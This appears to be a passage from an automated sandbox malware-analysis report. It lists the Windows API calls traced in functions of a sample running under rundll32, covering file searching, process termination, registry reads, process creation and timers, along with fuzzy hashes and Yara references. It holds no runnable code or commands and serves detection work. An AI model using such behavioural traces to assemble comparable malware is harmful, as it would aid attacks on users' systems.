                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F6AE7C: lstrlen.KERNEL32(04F6E448,00000000,00000000,?,?,04F77A5B,?,?,?,?,04F6E448,?), ref: 04F6AE8B
                              • Part of subcall function 04F6AE7C: mbstowcs.NTDLL ref: 04F6AEA7
                            • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 04F6EB0D
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 04F7BB1D
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 04F7BB29
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BB71
                              • Part of subcall function 04F7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BB8C
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(0000002C), ref: 04F7BBC4
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?), ref: 04F7BBCC
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BBEF
                              • Part of subcall function 04F7BAD1: wcscpy.NTDLL ref: 04F7BC01
                            • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 04F6EB2E
                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 04F6EB5A
                              • Part of subcall function 04F7BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04F7BC27
                              • Part of subcall function 04F7BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 04F7BC5D
                              • Part of subcall function 04F7BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 04F7BC79
                              • Part of subcall function 04F7BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 04F7BC92
                              • Part of subcall function 04F7BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 04F7BCA4
                              • Part of subcall function 04F7BAD1: FindClose.KERNEL32(?), ref: 04F7BCB9
                              • Part of subcall function 04F7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BCCD
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(0000002C), ref: 04F7BCEF
                            • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 04F6EB77
                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 04F6EB98
                            • PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 04F6EBAD
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                            • String ID:
                            • API String ID: 2670873185-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?,00000104,04F83A4E,00000000,?,?,04F79BAD,?,00000005,?,00000000), ref: 04F7EFBB
                            • lstrlen.KERNEL32(00000000,00000104,04F83A4E,00000000,?,?,04F79BAD,?,00000005), ref: 04F7EFD1
                            • lstrlen.KERNEL32(?,00000104,04F83A4E,00000000,?,?,04F79BAD,?,00000005), ref: 04F7EFE6
                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04F7F04B
                            • _snprintf.NTDLL ref: 04F7F071
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 04F7F090
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Heap$AllocateFree_snprintf
                            • String ID:
                            • API String ID: 3180502281-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04F6A990
                            • CreateWaitableTimerA.KERNEL32(04F8A1E8,00000001,?), ref: 04F6A9AD
                            • GetLastError.KERNEL32(?,00000000,04F78C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F6A9BE
                              • Part of subcall function 04F81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                              • Part of subcall function 04F81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                              • Part of subcall function 04F81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                              • Part of subcall function 04F81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6A9FE
                            • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6AA1D
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6AA33
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                            • String ID:
                            • API String ID: 1835239314-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,04F77C35,00000000,?,?,?), ref: 04F6F531
                            • StrChrA.SHLWAPI(00000001,00000020,?,?,?,04F77C35,00000000,?,?,?), ref: 04F6F542
                              • Part of subcall function 04F61F0F: lstrlen.KERNEL32(?,?,00000000,00000000,?,04F73D4E,00000000,?,?,00000000,00000001), ref: 04F61F21
                              • Part of subcall function 04F61F0F: StrChrA.SHLWAPI(?,0000000D,?,04F73D4E,00000000,?,?,00000000,00000001), ref: 04F61F59
                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04F6F582
                            • memcpy.NTDLL(00000000,?,00000007,?,?,?,04F77C35,00000000), ref: 04F6F5AF
                            • memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,04F77C35,00000000), ref: 04F6F5BE
                            • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,04F77C35,00000000), ref: 04F6F5D0
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 1819133394-0
                            • Opcode ID: 33fe80c928ac82904451bb35bf5dc59564849f2ea42680e8dfd8e55fd2130591
                            • Instruction ID: e580c4806b148d2fbd5dd5b5278d07273b859ead348b0b2622ecd27bbfb98e6f
                            • Opcode Fuzzy Hash: 33fe80c928ac82904451bb35bf5dc59564849f2ea42680e8dfd8e55fd2130591
                            • Instruction Fuzzy Hash: 53218E72A00109BFDB119F94EC84FAABBEDEF04244F044156FA05DF151D674ED458BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 04F804D9
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F804EA
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 04F80505
                            • GetLastError.KERNEL32 ref: 04F8051B
                            • HeapFree.KERNEL32(00000000,?), ref: 04F8052D
                            • HeapFree.KERNEL32(00000000,?), ref: 04F80542
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                            • String ID:
                            • API String ID: 1822509305-0
                            • Opcode ID: b8d05ac7d171765bdcbff3c152d89d028bed92a6dd55590cee8004c85e09aa80
                            • Instruction ID: af9cb3e1c27a3f1860345045c54942cc3e9c7bd5f7dfc3034da4dfad2a31dfd6
                            • Opcode Fuzzy Hash: b8d05ac7d171765bdcbff3c152d89d028bed92a6dd55590cee8004c85e09aa80
                            • Instruction Fuzzy Hash: 00112C76901028BFDB226A95EC08CEF7F7DEF46290B110465F909A9110DA355A56EBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 04F7C917
                            • _strupr.NTDLL ref: 04F7C952
                            • lstrlen.KERNEL32(00000000), ref: 04F7C95A
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 04F7C999
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 04F7C9A0
                            • GetLastError.KERNEL32 ref: 04F7C9A8
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                            • String ID:
                            • API String ID: 110452925-0
                            • Opcode ID: fdbb8d9585658d6bd9f2c5fdcd500f70f02f2afba5cc29f19a5dfc718dabb418
                            • Instruction ID: 6ca06b83429be9fe9d45d39f8a863342ed0c192d0b6cab83a1466f4966375654
                            • Opcode Fuzzy Hash: fdbb8d9585658d6bd9f2c5fdcd500f70f02f2afba5cc29f19a5dfc718dabb418
                            • Instruction Fuzzy Hash: 1611E772A00249FFDB506F70EC88DBE7BBDEB88750B10141AF906DA041EA7CEC418B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,?,7620F710), ref: 04F7B567
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 04F7B595
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04F7B5A7
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 04F7B5CC
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7B5E7
                            • RegCloseKey.ADVAPI32(?), ref: 04F7B5F1
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapQueryValue$AllocateCloseFreeOpen
                            • String ID:
                            • API String ID: 170146033-0
                            • Opcode ID: d59aed4b7b0ad35c6a5b33b8f8599167dba091afba8d90723f6e3c998515a668
                            • Instruction ID: a478f201213b4d1030fca5efa1ba4dda176bf808ca3172c68345e80508870a96
                            • Opcode Fuzzy Hash: d59aed4b7b0ad35c6a5b33b8f8599167dba091afba8d90723f6e3c998515a668
                            • Instruction Fuzzy Hash: D311D6B690010CFFDB119F99ED84CFEBBBDEB89704B10406AE901EA114D679AE45DB20
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(00000000,7620F730,-00000001,00000000,?,?,?,04F68EF7,?,00000000,000000FF), ref: 04F6A5F8
                            • lstrlen.KERNEL32(?,?,?,?,04F68EF7,?,00000000,000000FF), ref: 04F6A5FF
                            • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 04F6A611
                            • _snprintf.NTDLL ref: 04F6A637
                              • Part of subcall function 04F7C01F: memset.NTDLL ref: 04F7C034
                              • Part of subcall function 04F7C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,774CDBB0,00000020,00000000), ref: 04F7C06D
                              • Part of subcall function 04F7C01F: wcstombs.NTDLL ref: 04F7C077
                              • Part of subcall function 04F7C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,774CDBB0,00000020,00000000), ref: 04F7C0A8
                              • Part of subcall function 04F7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0D4
                              • Part of subcall function 04F7C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 04F7C0EA
                              • Part of subcall function 04F7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0FE
                              • Part of subcall function 04F7C01F: CloseHandle.KERNEL32(?), ref: 04F7C131
                              • Part of subcall function 04F7C01F: CloseHandle.KERNEL32(?), ref: 04F7C136
                            • _snprintf.NTDLL ref: 04F6A66B
                              • Part of subcall function 04F7C01F: GetLastError.KERNEL32 ref: 04F7C102
                              • Part of subcall function 04F7C01F: GetExitCodeProcess.KERNEL32(?,00000001), ref: 04F7C122
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 04F6A688
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                            • String ID:
                            • API String ID: 1481739438-0
                            • Opcode ID: f0536c91c3b1fba9d55a072da9f5ccd76c37e62ab9cf18f281aa8fca8653b5f5
                            • Instruction ID: 3ce038046e88aeba947c8d81726702c9630ea6442d688525b491f40dd775ade0
                            • Opcode Fuzzy Hash: f0536c91c3b1fba9d55a072da9f5ccd76c37e62ab9cf18f281aa8fca8653b5f5
                            • Instruction Fuzzy Hash: 5D115E72A0021DBFCB119F54EC84DAE3F6DEB05364B15805AFE09AB211D639EE15DBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(04F6261E,00000000,00000000,00000008,00000000,?,04F6261E,04F6988B,00000000,?), ref: 04F7F7A7
                            • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 04F7F7BA
                            • lstrcpy.KERNEL32(00000008,04F6261E), ref: 04F7F7DC
                            • GetLastError.KERNEL32(04F64A0A,00000000,00000000,?,04F6261E,04F6988B,00000000,?), ref: 04F7F805
                            • HeapFree.KERNEL32(00000000,00000000,?,04F6261E,04F6988B,00000000,?), ref: 04F7F81D
                            • CloseHandle.KERNEL32(00000000,04F64A0A,00000000,00000000,?,04F6261E,04F6988B,00000000,?), ref: 04F7F826
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                            • String ID:
                            • API String ID: 2860611006-0
                            • Opcode ID: 0101783bd94ae90e68a73e5ee3aded0a9609116a955bfd77d1710080d42d382d
                            • Instruction ID: de571bd87768e61c13ea5e0d0a129fc7a515ed1395d8cdf51d65ff0b78c8a732
                            • Opcode Fuzzy Hash: 0101783bd94ae90e68a73e5ee3aded0a9609116a955bfd77d1710080d42d382d
                            • Instruction Fuzzy Hash: E1115475A0024AFFD7109F64EC848AE7BA8FF00364714452FF926DB110D738AD46DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                            • GetCurrentThreadId.KERNEL32 ref: 04F750C4
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                            • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                            • lstrcpy.KERNEL32(00000000), ref: 04F75100
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                            • String ID:
                            • API String ID: 1175089793-0
                            • Opcode ID: 5710504b35045a3ec9f5fa9b91d3ea8887b85f90052c9036c4217fb09b9615ff
                            • Instruction ID: 73fbd41458aa3513b3b3b69367015be1cd7445c97a8e57de1ca600d690c59f6e
                            • Opcode Fuzzy Hash: 5710504b35045a3ec9f5fa9b91d3ea8887b85f90052c9036c4217fb09b9615ff
                            • Instruction Fuzzy Hash: 01018472E101197BDB115BA5AC89E7F3BACEF81B85709146AB905DB100DABCFC0687B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F64FB8
                            • lstrlen.KERNEL32(?,?), ref: 04F64FE9
                            • memcpy.NTDLL(00000008,?,00000001), ref: 04F64FF8
                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 04F6507A
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreelstrlenmemcpy
                            • String ID: W
                            • API String ID: 379260646-655174618
                            • Opcode ID: 49ee67706ea911c40efb2e521e942d4c057fe891cb49118e850f8d6e75ce208d
                            • Instruction ID: 37d6ac6cf42e7e47fd8a74488f56d4d601bac8612159f9a6b7742c1625646c3b
                            • Opcode Fuzzy Hash: 49ee67706ea911c40efb2e521e942d4c057fe891cb49118e850f8d6e75ce208d
                            • Instruction Fuzzy Hash: 9D41A331A0024ABFDB24AF58EC847AA77E9EB05304F14942EE45ADF250D335F587DB89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F75A17
                            • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 04F75A84
                            • GetLastError.KERNEL32(?,00000000,00000000), ref: 04F75A8E
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: BuffersErrorFileFlushLastmemset
                            • String ID: K$P
                            • API String ID: 3817869962-420285281
                            • Opcode ID: da90f6b134fa9d89275e8af695234614f21f0e87e6056b2e5fc0fed19e9e3b10
                            • Instruction ID: 8d598fdee32deca848ae99238284aa7ac9fc13e6c581e7f4b390dd04515bd17c
                            • Opcode Fuzzy Hash: da90f6b134fa9d89275e8af695234614f21f0e87e6056b2e5fc0fed19e9e3b10
                            • Instruction Fuzzy Hash: CE417070A01709AFEB24CFA4C984AAEBBF1FF44704F54992ED48693A40D338B946CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memcpy.NTDLL(?,04F6DE40,00000000,?,?,?,04F6DE40,?,?,?,?,?), ref: 04F6D121
                            • lstrlen.KERNEL32(04F6DE40,?,?,?,04F6DE40,?,?,?,?,?), ref: 04F6D13F
                            • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 04F6D1AE
                            • lstrlen.KERNEL32(04F6DE40,00000000,00000000,?,?,?,04F6DE40,?,?,?,?,?), ref: 04F6D1CF
                            • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 04F6D1E3
                            • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 04F6D1EC
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 04F6D1FA
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlenmemcpy$FreeLocal
                            • String ID:
                            • API String ID: 1123625124-0
                            • Opcode ID: fdf58a8ecab65011e3817238f6e9be17f28c43b44a4e8cd17dec69620c739c6a
                            • Instruction ID: 1311c928b3704e0687dba60088dd4071266500544e2a420fa521e7de3d8648b3
                            • Opcode Fuzzy Hash: fdf58a8ecab65011e3817238f6e9be17f28c43b44a4e8cd17dec69620c739c6a
                            • Instruction Fuzzy Hash: 784118B290021AAFEF11DF65EC4189F3BA8EF143A4B05401AFC05A7211E775EE618BE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,04F62028,?), ref: 04F6867A
                              • Part of subcall function 04F68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,04F62028,?), ref: 04F68697
                            • lstrlenW.KERNEL32(?,00000000,?,?,?), ref: 04F62055
                            • lstrlenW.KERNEL32(00000008,?,?,?), ref: 04F6205C
                            • lstrlenW.KERNEL32(?,?,?,?,?), ref: 04F6207A
                            • lstrlen.KERNEL32(00000000,?,00000000), ref: 04F62138
                            • lstrlenW.KERNEL32(?), ref: 04F62143
                            • wsprintfA.USER32 ref: 04F62185
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 04F6F3DB
                              • Part of subcall function 04F6F39B: GetLastError.KERNEL32 ref: 04F6F3E5
                              • Part of subcall function 04F6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 04F6F40A
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 04F6F42D
                              • Part of subcall function 04F6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 04F6F455
                              • Part of subcall function 04F6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 04F6F46A
                              • Part of subcall function 04F6F39B: SetEndOfFile.KERNEL32(00001000), ref: 04F6F477
                              • Part of subcall function 04F6F39B: CloseHandle.KERNEL32(00001000), ref: 04F6F48F
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                            • String ID:
                            • API String ID: 1727939831-0
                            • Opcode ID: dfdeb3f5afb321fb828422d9aa0fa82e90697832162cfab23f948eb57df1e9d9
                            • Instruction ID: a97d7ab992b77f8aa37b72c9be92b97c75f78111498d466674060a566fb24ddc
                            • Opcode Fuzzy Hash: dfdeb3f5afb321fb828422d9aa0fa82e90697832162cfab23f948eb57df1e9d9
                            • Instruction Fuzzy Hash: F2512072900109EFDF01EFA8DD44DAE7BB9EF44304B05846AF915AB251DB39EA12DF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,04F75583,00000000,00000000), ref: 04F67E46
                            • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 04F67ED9
                            • GetLastError.KERNEL32(?,?,0000011F), ref: 04F67F31
                            • GetLastError.KERNEL32 ref: 04F67F63
                            • GetLastError.KERNEL32 ref: 04F67F77
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04F75583,00000000,00000000,?,04F63EC6,?), ref: 04F67F8C
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$memcpy
                            • String ID:
                            • API String ID: 2760375183-0
                            • Opcode ID: abd58c2f0f4823d4d688e950a3ebb4777a8310c46d3d60abd4d89da5c11d1ee5
                            • Instruction ID: 72d4f1c493ea43166d7b481c4390c8f58fea7d9140815f2dc504548f0ce994e6
                            • Opcode Fuzzy Hash: abd58c2f0f4823d4d688e950a3ebb4777a8310c46d3d60abd4d89da5c11d1ee5
                            • Instruction Fuzzy Hash: 18512FB1900209BFDF10DFA4DC84EAEBBF9EB44354F104429F916E6240E774AE55DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • lstrcpy.KERNEL32(?,00000020), ref: 04F7AEF4
                            • lstrcat.KERNEL32(?,00000020), ref: 04F7AF09
                            • lstrcmp.KERNEL32(00000000,?), ref: 04F7AF20
                            • lstrlen.KERNEL32(?), ref: 04F7AF44
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                            • String ID:
                            • API String ID: 3214092121-3916222277
                            • Opcode ID: da1dfa3768ce675d40ee233472dfc2f407cff02245ca67444e95392eeacc8ee1
                            • Instruction ID: e509ddb873f24594bb38a22598b562730cd22521622ad3edb236847e796fb30a
                            • Opcode Fuzzy Hash: da1dfa3768ce675d40ee233472dfc2f407cff02245ca67444e95392eeacc8ee1
                            • Instruction Fuzzy Hash: BF518F71E00209EBDF21CF99C984AEDBBB6EF45314F06805BE8159F211C778BA52CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(?,04F83D54,06319A2B,00000057), ref: 04F6D5A3
                            • lstrlenW.KERNEL32(?,04F83D54,06319A2B,00000057), ref: 04F6D5B4
                            • lstrlenW.KERNEL32(?,04F83D54,06319A2B,00000057), ref: 04F6D5C6
                            • lstrlenW.KERNEL32(?,04F83D54,06319A2B,00000057), ref: 04F6D5D8
                            • lstrlenW.KERNEL32(?,04F83D54,06319A2B,00000057), ref: 04F6D5EA
                            • lstrlenW.KERNEL32(?,04F83D54,06319A2B,00000057), ref: 04F6D5F6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen
                            • String ID:
                            • API String ID: 1659193697-0
                            • Opcode ID: e4285d7d0a42f80178325b4572fd31d78f941db49b3d592636369fd0558b291a
                            • Instruction ID: 07a080e5bb7826f0722296210155f3f8bc0659955e078dad59e0a0fa014d9529
                            • Opcode Fuzzy Hash: e4285d7d0a42f80178325b4572fd31d78f941db49b3d592636369fd0558b291a
                            • Instruction Fuzzy Hash: 8B412F71F0060AAFCF20DF99C880A6EB7FAFF98204B14896DD556E7600E775E9068F50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F724C3: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 04F724CF
